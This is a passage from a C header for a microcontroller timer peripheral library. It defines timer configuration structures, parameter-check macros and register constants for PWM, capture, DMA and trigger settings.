TIM1 and TIM8. */ typedef struct { uint16_t TIM_OSSRState; /*!< Specifies the Off-State selection used in Run mode. This parameter can be a value of @ref OSSR_Off_State_Selection_for_Run_mode_state */ uint16_t TIM_OSSIState; /*!< Specifies the Off-State used in Idle state. This parameter can be a value of @ref OSSI_Off_State_Selection_for_Idle_mode_state */ uint16_t TIM_LOCKLevel; /*!< Specifies the LOCK level parameters. This parameter can be a value of @ref Lock_level */ uint16_t TIM_DeadTime; /*!< Specifies the delay time between the switching-off and the switching-on of the outputs. This parameter can be a number between 0x00 and 0xFF */ uint16_t TIM_Break; /*!< Specifies whether the TIM Break input is enabled or not. This parameter can be a value of @ref Break_Input_enable_disable */ uint16_t TIM_BreakPolarity; /*!< Specifies the TIM Break Input pin polarity. This parameter can be a value of @ref Break_Polarity */ uint16_t TIM_AutomaticOutput; /*!< Specifies whether the TIM Automatic Output feature is enabled or not. 
This parameter can be a value of @ref TIM_AOE_Bit_Set_Reset */ } TIM_BDTRInitTypeDef; /** @defgroup TIM_Exported_constants * @{ */ #define IS_TIM_ALL_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM6) || \ ((PERIPH) == TIM7) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM9) || \ ((PERIPH) == TIM10)|| \ ((PERIPH) == TIM11)|| \ ((PERIPH) == TIM12)|| \ ((PERIPH) == TIM13)|| \ ((PERIPH) == TIM14)|| \ ((PERIPH) == TIM15)|| \ ((PERIPH) == TIM16)|| \ ((PERIPH) == TIM17)) /* LIST1: TIM 1 and 8 */ #define IS_TIM_LIST1_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM8)) /* LIST2: TIM 1, 8, 15 16 and 17 */ #define IS_TIM_LIST2_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM15)|| \ ((PERIPH) == TIM16)|| \ ((PERIPH) == TIM17)) /* LIST3: TIM 1, 2, 3, 4, 5 and 8 */ #define IS_TIM_LIST3_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM8)) /* LIST4: TIM 1, 2, 3, 4, 5, 8, 15, 16 and 17 */ #define IS_TIM_LIST4_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM15)|| \ ((PERIPH) == TIM16)|| \ ((PERIPH) == TIM17)) /* LIST5: TIM 1, 2, 3, 4, 5, 8 and 15 */ #define IS_TIM_LIST5_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM15)) /* LIST6: TIM 1, 2, 3, 4, 5, 8, 9, 12 and 15 */ #define IS_TIM_LIST6_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM9) || \ ((PERIPH) == TIM12)|| \ ((PERIPH) == TIM15)) /* LIST7: TIM 1, 2, 3, 4, 5, 6, 7, 8, 9, 12 and 15 */ #define 
IS_TIM_LIST7_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM6) || \ ((PERIPH) == TIM7) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM9) || \ ((PERIPH) == TIM12)|| \ ((PERIPH) == TIM15)) /* LIST8: TIM 1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 13, 14, 15, 16 and 17 */ #define IS_TIM_LIST8_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM9) || \ ((PERIPH) == TIM10)|| \ ((PERIPH) == TIM11)|| \ ((PERIPH) == TIM12)|| \ ((PERIPH) == TIM13)|| \ ((PERIPH) == TIM14)|| \ ((PERIPH) == TIM15)|| \ ((PERIPH) == TIM16)|| \ ((PERIPH) == TIM17)) /* LIST9: TIM 1, 2, 3, 4, 5, 6, 7, 8, 15, 16, and 17 */ #define IS_TIM_LIST9_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || \ ((PERIPH) == TIM6) || \ ((PERIPH) == TIM7) || \ ((PERIPH) == TIM8) || \ ((PERIPH) == TIM15)|| \ ((PERIPH) == TIM16)|| \ ((PERIPH) == TIM17)) /** * @} */ /** @defgroup TIM_Output_Compare_and_PWM_modes * @{ */ #define TIM_OCMode_Timing ((uint16_t)0x0000) #define TIM_OCMode_Active ((uint16_t)0x0010) #define TIM_OCMode_Inactive ((uint16_t)0x0020) #define TIM_OCMode_Toggle ((uint16_t)0x0030) #define TIM_OCMode_PWM1 ((uint16_t)0x0060) #define TIM_OCMode_PWM2 ((uint16_t)0x0070) #define IS_TIM_OC_MODE(MODE) (((MODE) == TIM_OCMode_Timing) || \ ((MODE) == TIM_OCMode_Active) || \ ((MODE) == TIM_OCMode_Inactive) || \ ((MODE) == TIM_OCMode_Toggle)|| \ ((MODE) == TIM_OCMode_PWM1) || \ ((MODE) == TIM_OCMode_PWM2)) #define IS_TIM_OCM(MODE) (((MODE) == TIM_OCMode_Timing) || \ ((MODE) == TIM_OCMode_Active) || \ ((MODE) == TIM_OCMode_Inactive) || \ ((MODE) == TIM_OCMode_Toggle)|| \ ((MODE) == TIM_OCMode_PWM1) || \ ((MODE) == TIM_OCMode_PWM2) || \ ((MODE) == TIM_ForcedAction_Active) || \ ((MODE) == TIM_ForcedAction_InActive)) /** * @} 
*/ /** @defgroup TIM_One_Pulse_Mode * @{ */ #define TIM_OPMode_Single ((uint16_t)0x0008) #define TIM_OPMode_Repetitive ((uint16_t)0x0000) #define IS_TIM_OPM_MODE(MODE) (((MODE) == TIM_OPMode_Single) || \ ((MODE) == TIM_OPMode_Repetitive)) /** * @} */ /** @defgroup TIM_Channel * @{ */ #define TIM_Channel_1 ((uint16_t)0x0000) #define TIM_Channel_2 ((uint16_t)0x0004) #define TIM_Channel_3 ((uint16_t)0x0008) #define TIM_Channel_4 ((uint16_t)0x000C) #define IS_TIM_CHANNEL(CHANNEL) (((CHANNEL) == TIM_Channel_1) || \ ((CHANNEL) == TIM_Channel_2) || \ ((CHANNEL) == TIM_Channel_3) || \ ((CHANNEL) == TIM_Channel_4)) #define IS_TIM_PWMI_CHANNEL(CHANNEL) (((CHANNEL) == TIM_Channel_1) || \ ((CHANNEL) == TIM_Channel_2)) #define IS_TIM_COMPLEMENTARY_CHANNEL(CHANNEL) (((CHANNEL) == TIM_Channel_1) || \ ((CHANNEL) == TIM_Channel_2) || \ ((CHANNEL) == TIM_Channel_3)) /** * @} */ /** @defgroup TIM_Clock_Division_CKD * @{ */ #define TIM_CKD_DIV1 ((uint16_t)0x0000) #define TIM_CKD_DIV2 ((uint16_t)0x0100) #define TIM_CKD_DIV4 ((uint16_t)0x0200) #define IS_TIM_CKD_DIV(DIV) (((DIV) == TIM_CKD_DIV1) || \ ((DIV) == TIM_CKD_DIV2) || \ ((DIV) == TIM_CKD_DIV4)) /** * @} */ /** @defgroup TIM_Counter_Mode * @{ */ #define TIM_CounterMode_Up ((uint16_t)0x0000) #define TIM_CounterMode_Down ((uint16_t)0x0010) #define TIM_CounterMode_CenterAligned1 ((uint16_t)0x0020) #define TIM_CounterMode_CenterAligned2 ((uint16_t)0x0040) #define TIM_CounterMode_CenterAligned3 ((uint16_t)0x0060) #define IS_TIM_COUNTER_MODE(MODE) (((MODE) == TIM_CounterMode_Up) || \ ((MODE) == TIM_CounterMode_Down) || \ ((MODE) == TIM_CounterMode_CenterAligned1) || \ ((MODE) == TIM_CounterMode_CenterAligned2) || \ ((MODE) == TIM_CounterMode_CenterAligned3)) /** * @} */ /** @defgroup TIM_Output_Compare_Polarity * @{ */ #define TIM_OCPolarity_High ((uint16_t)0x0000) #define TIM_OCPolarity_Low ((uint16_t)0x0002) #define IS_TIM_OC_POLARITY(POLARITY) (((POLARITY) == TIM_OCPolarity_High) || \ ((POLARITY) == TIM_OCPolarity_Low)) /** * @} */ 
/** @defgroup TIM_Output_Compare_N_Polarity * @{ */ #define TIM_OCNPolarity_High ((uint16_t)0x0000) #define TIM_OCNPolarity_Low ((uint16_t)0x0008) #define IS_TIM_OCN_POLARITY(POLARITY) (((POLARITY) == TIM_OCNPolarity_High) || \ ((POLARITY) == TIM_OCNPolarity_Low)) /** * @} */ /** @defgroup TIM_Output_Compare_state * @{ */ #define TIM_OutputState_Disable ((uint16_t)0x0000) #define TIM_OutputState_Enable ((uint16_t)0x0001) #define IS_TIM_OUTPUT_STATE(STATE) (((STATE) == TIM_OutputState_Disable) || \ ((STATE) == TIM_OutputState_Enable)) /** * @} */ /** @defgroup TIM_Output_Compare_N_state * @{ */ #define TIM_OutputNState_Disable ((uint16_t)0x0000) #define TIM_OutputNState_Enable ((uint16_t)0x0004) #define IS_TIM_OUTPUTN_STATE(STATE) (((STATE) == TIM_OutputNState_Disable) || \ ((STATE) == TIM_OutputNState_Enable)) /** * @} */ /** @defgroup TIM_Capture_Compare_state * @{ */ #define TIM_CCx_Enable ((uint16_t)0x0001) #define TIM_CCx_Disable ((uint16_t)0x0000) #define IS_TIM_CCX(CCX) (((CCX) == TIM_CCx_Enable) || \ ((CCX) == TIM_CCx_Disable)) /** * @} */ /** @defgroup TIM_Capture_Compare_N_state * @{ */ #define TIM_CCxN_Enable ((uint16_t)0x0004) #define TIM_CCxN_Disable ((uint16_t)0x0000) #define IS_TIM_CCXN(CCXN) (((CCXN) == TIM_CCxN_Enable) || \ ((CCXN) == TIM_CCxN_Disable)) /** * @} */ /** @defgroup Break_Input_enable_disable * @{ */ #define TIM_Break_Enable ((uint16_t)0x1000) #define TIM_Break_Disable ((uint16_t)0x0000) #define IS_TIM_BREAK_STATE(STATE) (((STATE) == TIM_Break_Enable) || \ ((STATE) == TIM_Break_Disable)) /** * @} */ /** @defgroup Break_Polarity * @{ */ #define TIM_BreakPolarity_Low ((uint16_t)0x0000) #define TIM_BreakPolarity_High ((uint16_t)0x2000) #define IS_TIM_BREAK_POLARITY(POLARITY) (((POLARITY) == TIM_BreakPolarity_Low) || \ ((POLARITY) == TIM_BreakPolarity_High)) /** * @} */ /** @defgroup TIM_AOE_Bit_Set_Reset * @{ */ #define TIM_AutomaticOutput_Enable ((uint16_t)0x4000) #define TIM_AutomaticOutput_Disable ((uint16_t)0x0000) #define 
IS_TIM_AUTOMATIC_OUTPUT_STATE(STATE) (((STATE) == TIM_AutomaticOutput_Enable) || \ ((STATE) == TIM_AutomaticOutput_Disable)) /** * @} */ /** @defgroup Lock_level * @{ */ #define TIM_LOCKLevel_OFF ((uint16_t)0x0000) #define TIM_LOCKLevel_1 ((uint16_t)0x0100) #define TIM_LOCKLevel_2 ((uint16_t)0x0200) #define TIM_LOCKLevel_3 ((uint16_t)0x0300) #define IS_TIM_LOCK_LEVEL(LEVEL) (((LEVEL) == TIM_LOCKLevel_OFF) || \ ((LEVEL) == TIM_LOCKLevel_1) || \ ((LEVEL) == TIM_LOCKLevel_2) || \ ((LEVEL) == TIM_LOCKLevel_3)) /** * @} */ /** @defgroup OSSI_Off_State_Selection_for_Idle_mode_state * @{ */ #define TIM_OSSIState_Enable ((uint16_t)0x0400) #define TIM_OSSIState_Disable ((uint16_t)0x0000) #define IS_TIM_OSSI_STATE(STATE) (((STATE) == TIM_OSSIState_Enable) || \ ((STATE) == TIM_OSSIState_Disable)) /** * @} */ /** @defgroup OSSR_Off_State_Selection_for_Run_mode_state * @{ */ #define TIM_OSSRState_Enable ((uint16_t)0x0800) #define TIM_OSSRState_Disable ((uint16_t)0x0000) #define IS_TIM_OSSR_STATE(STATE) (((STATE) == TIM_OSSRState_Enable) || \ ((STATE) == TIM_OSSRState_Disable)) /** * @} */ /** @defgroup TIM_Output_Compare_Idle_State * @{ */ #define TIM_OCIdleState_Set ((uint16_t)0x0100) #define TIM_OCIdleState_Reset ((uint16_t)0x0000) #define IS_TIM_OCIDLE_STATE(STATE) (((STATE) == TIM_OCIdleState_Set) || \ ((STATE) == TIM_OCIdleState_Reset)) /** * @} */ /** @defgroup TIM_Output_Compare_N_Idle_State * @{ */ #define TIM_OCNIdleState_Set ((uint16_t)0x0200) #define TIM_OCNIdleState_Reset ((uint16_t)0x0000) #define IS_TIM_OCNIDLE_STATE(STATE) (((STATE) == TIM_OCNIdleState_Set) || \ ((STATE) == TIM_OCNIdleState_Reset)) /** * @} */ /** @defgroup TIM_Input_Capture_Polarity * @{ */ #define TIM_ICPolarity_Rising ((uint16_t)0x0000) #define TIM_ICPolarity_Falling ((uint16_t)0x0002) #define TIM_ICPolarity_BothEdge ((uint16_t)0x000A) #define IS_TIM_IC_POLARITY(POLARITY) (((POLARITY) == TIM_ICPolarity_Rising) || \ ((POLARITY) == TIM_ICPolarity_Falling)) #define 
IS_TIM_IC_POLARITY_LITE(POLARITY) (((POLARITY) == TIM_ICPolarity_Rising) || \ ((POLARITY) == TIM_ICPolarity_Falling)|| \ ((POLARITY) == TIM_ICPolarity_BothEdge)) /** * @} */ /** @defgroup TIM_Input_Capture_Selection * @{ */ #define TIM_ICSelection_DirectTI ((uint16_t)0x0001) /*!< TIM Input 1, 2, 3 or 4 is selected to be connected to IC1, IC2, IC3 or IC4, respectively */ #define TIM_ICSelection_IndirectTI ((uint16_t)0x0002) /*!< TIM Input 1, 2, 3 or 4 is selected to be connected to IC2, IC1, IC4 or IC3, respectively. */ #define TIM_ICSelection_TRC ((uint16_t)0x0003) /*!< TIM Input 1, 2, 3 or 4 is selected to be connected to TRC. */ #define IS_TIM_IC_SELECTION(SELECTION) (((SELECTION) == TIM_ICSelection_DirectTI) || \ ((SELECTION) == TIM_ICSelection_IndirectTI) || \ ((SELECTION) == TIM_ICSelection_TRC)) /** * @} */ /** @defgroup TIM_Input_Capture_Prescaler * @{ */ #define TIM_ICPSC_DIV1 ((uint16_t)0x0000) /*!< Capture performed each time an edge is detected on the capture input. */ #define TIM_ICPSC_DIV2 ((uint16_t)0x0004) /*!< Capture performed once every 2 events. */ #define TIM_ICPSC_DIV4 ((uint16_t)0x0008) /*!< Capture performed once every 4 events. */ #define TIM_ICPSC_DIV8 ((uint16_t)0x000C) /*!< Capture performed once every 8 events. 
*/ #define IS_TIM_IC_PRESCALER(PRESCALER) (((PRESCALER) == TIM_ICPSC_DIV1) || \ ((PRESCALER) == TIM_ICPSC_DIV2) || \ ((PRESCALER) == TIM_ICPSC_DIV4) || \ ((PRESCALER) == TIM_ICPSC_DIV8)) /** * @} */ /** @defgroup TIM_interrupt_sources * @{ */ #define TIM_IT_Update ((uint16_t)0x0001) #define TIM_IT_CC1 ((uint16_t)0x0002) #define TIM_IT_CC2 ((uint16_t)0x0004) #define TIM_IT_CC3 ((uint16_t)0x0008) #define TIM_IT_CC4 ((uint16_t)0x0010) #define TIM_IT_COM ((uint16_t)0x0020) #define TIM_IT_Trigger ((uint16_t)0x0040) #define TIM_IT_Break ((uint16_t)0x0080) #define IS_TIM_IT(IT) ((((IT) & (uint16_t)0xFF00) == 0x0000) && ((IT) != 0x0000)) #define IS_TIM_GET_IT(IT) (((IT) == TIM_IT_Update) || \ ((IT) == TIM_IT_CC1) || \ ((IT) == TIM_IT_CC2) || \ ((IT) == TIM_IT_CC3) || \ ((IT) == TIM_IT_CC4) || \ ((IT) == TIM_IT_COM) || \ ((IT) == TIM_IT_Trigger) || \ ((IT) == TIM_IT_Break)) /** * @} */ /** @defgroup TIM_DMA_Base_address * @{ */ #define TIM_DMABase_CR1 ((uint16_t)0x0000) #define TIM_DMABase_CR2 ((uint16_t)0x0001) #define TIM_DMABase_SMCR ((uint16_t)0x0002) #define TIM_DMABase_DIER ((uint16_t)0x0003) #define TIM_DMABase_SR ((uint16_t)0x0004) #define TIM_DMABase_EGR ((uint16_t)0x0005) #define TIM_DMABase_CCMR1 ((uint16_t)0x0006) #define TIM_DMABase_CCMR2 ((uint16_t)0x0007) #define TIM_DMABase_CCER ((uint16_t)0x0008) #define TIM_DMABase_CNT ((uint16_t)0x0009) #define TIM_DMABase_PSC ((uint16_t)0x000A) #define TIM_DMABase_ARR ((uint16_t)0x000B) #define TIM_DMABase_RCR ((uint16_t)0x000C) #define TIM_DMABase_CCR1 ((uint16_t)0x000D) #define TIM_DMABase_CCR2 ((uint16_t)0x000E) #define TIM_DMABase_CCR3 ((uint16_t)0x000F) #define TIM_DMABase_CCR4 ((uint16_t)0x0010) #define TIM_DMABase_BDTR ((uint16_t)0x0011) #define TIM_DMABase_DCR ((uint16_t)0x0012) #define IS_TIM_DMA_BASE(BASE) (((BASE) == TIM_DMABase_CR1) || \ ((BASE) == TIM_DMABase_CR2) || \ ((BASE) == TIM_DMABase_SMCR) || \ ((BASE) == TIM_DMABase_DIER) || \ ((BASE) == TIM_DMABase_SR) || \ ((BASE) == TIM_DMABase_EGR) || \ ((BASE) 
== TIM_DMABase_CCMR1) || \ ((BASE) == TIM_DMABase_CCMR2) || \ ((BASE) == TIM_DMABase_CCER) || \ ((BASE) == TIM_DMABase_CNT) || \ ((BASE) == TIM_DMABase_PSC) || \ ((BASE) == TIM_DMABase_ARR) || \ ((BASE) == TIM_DMABase_RCR) || \ ((BASE) == TIM_DMABase_CCR1) || \ ((BASE) == TIM_DMABase_CCR2) || \ ((BASE) == TIM_DMABase_CCR3) || \ ((BASE) == TIM_DMABase_CCR4) || \ ((BASE) == TIM_DMABase_BDTR) || \ ((BASE) == TIM_DMABase_DCR)) /** * @} */ /** @defgroup TIM_DMA_Burst_Length * @{ */ #define TIM_DMABurstLength_1Transfer ((uint16_t)0x0000) #define TIM_DMABurstLength_2Transfers ((uint16_t)0x0100) #define TIM_DMABurstLength_3Transfers ((uint16_t)0x0200) #define TIM_DMABurstLength_4Transfers ((uint16_t)0x0300) #define TIM_DMABurstLength_5Transfers ((uint16_t)0x0400) #define TIM_DMABurstLength_6Transfers ((uint16_t)0x0500) #define TIM_DMABurstLength_7Transfers ((uint16_t)0x0600) #define TIM_DMABurstLength_8Transfers ((uint16_t)0x0700) #define TIM_DMABurstLength_9Transfers ((uint16_t)0x0800) #define TIM_DMABurstLength_10Transfers ((uint16_t)0x0900) #define TIM_DMABurstLength_11Transfers ((uint16_t)0x0A00) #define TIM_DMABurstLength_12Transfers ((uint16_t)0x0B00) #define TIM_DMABurstLength_13Transfers ((uint16_t)0x0C00) #define TIM_DMABurstLength_14Transfers ((uint16_t)0x0D00) #define TIM_DMABurstLength_15Transfers ((uint16_t)0x0E00) #define TIM_DMABurstLength_16Transfers ((uint16_t)0x0F00) #define TIM_DMABurstLength_17Transfers ((uint16_t)0x1000) #define TIM_DMABurstLength_18Transfers ((uint16_t)0x1100) #define IS_TIM_DMA_LENGTH(LENGTH) (((LENGTH) == TIM_DMABurstLength_1Transfer) || \ ((LENGTH) == TIM_DMABurstLength_2Transfers) || \ ((LENGTH) == TIM_DMABurstLength_3Transfers) || \ ((LENGTH) == TIM_DMABurstLength_4Transfers) || \ ((LENGTH) == TIM_DMABurstLength_5Transfers) || \ ((LENGTH) == TIM_DMABurstLength_6Transfers) || \ ((LENGTH) == TIM_DMABurstLength_7Transfers) || \ ((LENGTH) == TIM_DMABurstLength_8Transfers) || \ ((LENGTH) == TIM_DMABurstLength_9Transfers) || \ 
((LENGTH) == TIM_DMABurstLength_10Transfers) || \ ((LENGTH) == TIM_DMABurstLength_11Transfers) || \ ((LENGTH) == TIM_DMABurstLength_12Transfers) || \ ((LENGTH) == TIM_DMABurstLength_13Transfers) || \ ((LENGTH) == TIM_DMABurstLength_14Transfers) || \ ((LENGTH) == TIM_DMABurstLength_15Transfers) || \ ((LENGTH) == TIM_DMABurstLength_16Transfers) || \ ((LENGTH) == TIM_DMABurstLength_17Transfers) || \ ((LENGTH) == TIM_DMABurstLength_18Transfers)) /** * @} */ /** @defgroup TIM_DMA_sources * @{ */ #define TIM_DMA_Update ((uint16_t)0x0100) #define TIM_DMA_CC1 ((uint16_t)0x0200) #define TIM_DMA_CC2 ((uint16_t)0x0400) #define TIM_DMA_CC3 ((uint16_t)0x0800) #define TIM_DMA_CC4 ((uint16_t)0x1000) #define TIM_DMA_COM ((uint16_t)0x2000) #define TIM_DMA_Trigger ((uint16_t)0x4000) #define IS_TIM_DMA_SOURCE(SOURCE) ((((SOURCE) & (uint16_t)0x80FF) == 0x0000) && ((SOURCE) != 0x0000)) /** * @} */ /** @defgroup TIM_External_Trigger_Prescaler * @{ */ #define TIM_ExtTRGPSC_OFF ((uint16_t)0x0000) #define TIM_ExtTRGPSC_DIV2 ((uint16_t)0x1000) #define TIM_ExtTRGPSC_DIV4 ((uint16_t)0x2000) #define TIM_ExtTRGPSC_DIV8 ((uint16_t)0x3000) #define IS_TIM_EXT_PRESCALER(PRESCALER) (((PRESCALER) == TIM_ExtTRGPSC_OFF) || \ ((PRESCALER) == TIM_ExtTRGPSC_DIV2) || \ ((PRESCALER) == TIM_ExtTRGPSC_DIV4) || \ ((PRESCALER) == TIM_ExtTRGPSC_DIV8)) /** * @} */ /** @defgroup TIM_Internal_Trigger_Selection * @{ */ #define TIM_TS_ITR0 ((uint16_t)0x0000) #define TIM_TS_ITR1 ((uint16_t)0x0010) #define TIM_TS_ITR2 ((uint16_t)0x0020) #define TIM_TS_ITR3 ((uint16_t)0x0030) #define TIM_TS_TI1F_ED ((uint16_t)0x0040) #define TIM_TS_TI1FP1 ((uint16_t)0x0050) #define TIM_TS_TI2FP2 ((uint16_t)0x0060) #define TIM_TS_ETRF ((uint16_t)0x0070) #define IS_TIM_TRIGGER_SELECTION(SELECTION) (((SELECTION) == TIM_TS_ITR0) || \ ((SELECTION) == TIM_TS_ITR1) || \ ((SELECTION) == TIM_TS_ITR2) || \ ((SELECTION) == TIM_TS_ITR3) || \ ((SELECTION) == TIM_TS_TI1F_ED) || \ ((SELECTION) == TIM_TS_TI1FP1) || \ ((SELECTION) == TIM_TS_TI2FP2) || \ 
((SELECTION) == TIM_TS_ETRF)) #define IS_TIM_INTERNAL_TRIGGER_SELECTION(SELECTION) (((SELECTION) == TIM_TS_ITR0) || \ ((SELECTION) == TIM_TS_ITR1) || \ ((SELECTION) == TIM_TS_ITR2) || \ ((SELECTION) == TIM_TS_ITR3)) /** * @} */ /** @defgroup TIM_TIx_External_Clock_Source * @{ */ #define TIM_TIxExternalCLK1Source_TI1 ((uint16_t)0x0050) #define TIM_TIxExternalCLK1Source_TI2 ((uint16_t)0x0060) #define TIM_TIxExternalCLK1Source_TI1ED ((uint16_t)0x0040) #define IS_TIM_TIXCLK_SOURCE(SOURCE) (((SOURCE) == TIM_TIxExternalCLK1Source_TI1) || \ ((SOURCE) == TIM_TIxExternalCLK1Source_TI2) || \ ((SOURCE) == TIM_TIxExternalCLK1Source_TI1ED)) /** * @} */ /** @defgroup TIM_External_Trigger_Polarity * @{ */ #define TIM_ExtTRGPolarity_Inverted ((uint16_t)0x8000) #define TIM_ExtTRGPolarity_NonInverted ((uint16_t)0x0000) #define IS_TIM_EXT_POLARITY(POLARITY) (((POLARITY) == TIM_ExtTRGPolarity_Inverted) || \ ((POLARITY) == TIM_ExtTRGPolarity_NonInverted)) /** * @} */ /** @defgroup TIM_Prescaler_Reload_Mode * @{ */ #define TIM_PSCReloadMode_Update ((uint16_t)0x0000) #define TIM_PSCReloadMode_Immediate ((uint16_t)0x0001) #define IS_TIM_PRESCALER_RELOAD(RELOAD) (((RELOAD) == TIM_PSCReloadMode_Update) || \ ((RELOAD) == TIM_PSCReloadMode_Immediate)) /** * @} */ /** @defgroup TIM_Forced_Action * @{ */ #define TIM_ForcedAction_Active ((uint16_t)0x0050) #define TIM_ForcedAction_InActive ((uint16_t)0x0040) #define IS_TIM_FORCED_ACTION(ACTION) (((ACTION) == TIM_ForcedAction_Active) || \ ((ACTION) == TIM_ForcedAction_InActive)) /** * @} */ /** @defgroup TIM_Encoder_Mode * @{ */ #define TIM_EncoderMode_TI1 ((uint16_t)0x0001) #define TIM_EncoderMode_TI2 ((uint16_t)0x0002) #define TIM_EncoderMode_TI12 ((uint16_t)0x0003) #define IS_TIM_ENCODER_MODE(MODE) (((MODE) == TIM_EncoderMode_TI1) || \ ((MODE) == TIM_EncoderMode_TI2) || \ ((MODE) == TIM_EncoderMode_TI12)) /** * @} */ /** @defgroup TIM_Event_Source * @{ */ #define TIM_EventSource_Update ((uint16_t)0x0001) #define TIM_EventSource_CC1 
((uint16_t)0x0002) #define TIM_EventSource_CC2 ((uint16_t)0x0004) #define TIM_EventSource_CC3 ((uint16_t)0x0008) #define TIM_EventSource_CC4 ((uint16_t)0x0010) #define TIM_EventSource_COM ((uint16_t)0x0020) #define TIM_EventSource_Trigger ((uint16_t)0x0040) #define TIM_EventSource_Break ((uint16_t)0x0080) #define IS_TIM_EVENT_SOURCE(SOURCE) ((((SOURCE) & (uint16_t)0xFF00) == 0x0000) && ((SOURCE) != 0x0000)) /** * @} */ /** @defgroup TIM_Update_Source * @{ */ #define TIM_UpdateSource_Global ((uint16_t)0x0000) /*!< Source of update is the counter overflow/underflow or the setting of UG bit, or an update generation through the slave mode controller. */ #define TIM_UpdateSource_Regular ((uint16_t)0x0001) /*!< Source of update is counter overflow/underflow. */ #define IS_TIM_UPDATE_SOURCE(SOURCE) (((SOURCE) == TIM_UpdateSource_Global) || \ ((SOURCE) == TIM_UpdateSource_Regular)) /** * @} */ /** @defgroup TIM_Output_Compare_Preload_State * @{ */ #define TIM_OCPreload_Enable ((uint16_t)0x0008) #define TIM_OCPreload_Disable ((uint16_t)0x0000) #define IS_TIM_OCPRELOAD_STATE(STATE) (((STATE) == TIM_OCPreload_Enable) || \ ((STATE) == TIM_OCPreload_Disable)) /** * @} */ /** @defgroup TIM_Output_Compare_Fast_State * @{ */ #define TIM_OCFast_Enable ((uint16_t)0x0004) #define TIM_OCFast_Disable ((uint16_t)0x0000) #define IS_TIM_OCFAST_STATE(STATE) (((STATE) == TIM_OCFast_Enable) || \ ((STATE) == TIM_OCFast_Disable)) /** * @} */ /** @defgroup TIM_Output_Compare_Clear_State * @{ */ #define TIM_OCClear_Enable ((uint16_t)0x0080) #define TIM_OCClear_Disable ((uint16_t)0x0000) #define IS_TIM_OCCLEAR_STATE(STATE) (((STATE) == TIM_OCClear_Enable) || \ ((STATE) == TIM_OCClear_Disable)) /** * @} */ /** @defgroup TIM_Trigger_Output_Source * @{ */ #define TIM_TRGOSource_Reset ((uint16_t)0x0000) #define TIM_TRGOSource_Enable ((uint16_t)0x0010) #define TIM_TRGOSource_Update ((uint16_t)0x0020) #define TIM_TRGOSource_OC1 ((uint16_t)0x0030) #define TIM_TRGOSource_OC1Ref ((uint16_t)0x0040) #define 
TIM_TRGOSource_OC2Ref ((uint16_t)0x0050) #define TIM_TRGOSource_OC3Ref ((uint16_t)0x0060) #define TIM_TRGOSource_OC4Ref ((uint16_t)0x0070) #define IS_TIM_TRGO_SOURCE(SOURCE) (((SOURCE) == TIM_TRGOSource_Reset) || \ ((SOURCE) == TIM_TRGOSource_Enable) || \ ((SOURCE) == TIM_TRGOSource_Update) || \ ((SOURCE) == TIM_TRGOSource_OC1) || \ ((SOURCE) == TIM_TRGOSource_OC1Ref) || \ ((SOURCE) == TIM_TRGOSource_OC2Ref) || \ ((SOURCE) == TIM_TRGOSource_OC3Ref) || \ ((SOURCE) == TIM_TRGOSource_OC4Ref)) /** * @} */ /** @defgroup TIM_Slave_Mode * @{ */ #define TIM_SlaveMode_Reset ((uint16_t)0x0004) #define TIM_SlaveMode_Gated ((uint16_t)0x0005) #define TIM_SlaveMode_Trigger ((uint16_t)0x0006) #define TIM_SlaveMode_External1 ((uint16_t)0x0007) #define IS_TIM_SLAVE_MODE(MODE) (((MODE) == TIM_SlaveMode_Reset) || \ ((MODE) == TIM_SlaveMode_Gated) || \ ((MODE) == TIM_SlaveMode_Trigger) || \ ((MODE) == TIM_SlaveMode_External1)) /** * @} */ /** @defgroup TIM_Master_Slave_Mode * @{ */ #define TIM_MasterSlaveMode_Enable ((uint16_t)0x0080) #define TIM_MasterSlaveMode_Disable ((uint16_t)0x0000) #define IS_TIM_MSM_STATE(STATE) (((STATE) == TIM_MasterSlaveMode_Enable) || \ ((STATE) == TIM_MasterSlaveMode_Disable)) /** * @} */ /** @defgroup TIM_Flags * @{ */ #define TIM_FLAG_Update ((uint16_t)0x0001) #define TIM_FLAG_CC1 ((uint16_t)0x0002) #define TIM_FLAG_CC2 ((uint16_t)0x0004) #define TIM_FLAG_CC3 ((uint16_t)0x0008) #define TIM_FLAG_CC4 ((uint16_t)0x0010) #define TIM_FLAG_COM ((uint16_t)0x0020) #define TIM_FLAG_Trigger ((uint16_t)0x0040) #define TIM_FLAG_Break ((uint16_t)0x0080) #define TIM_FLAG_CC1OF 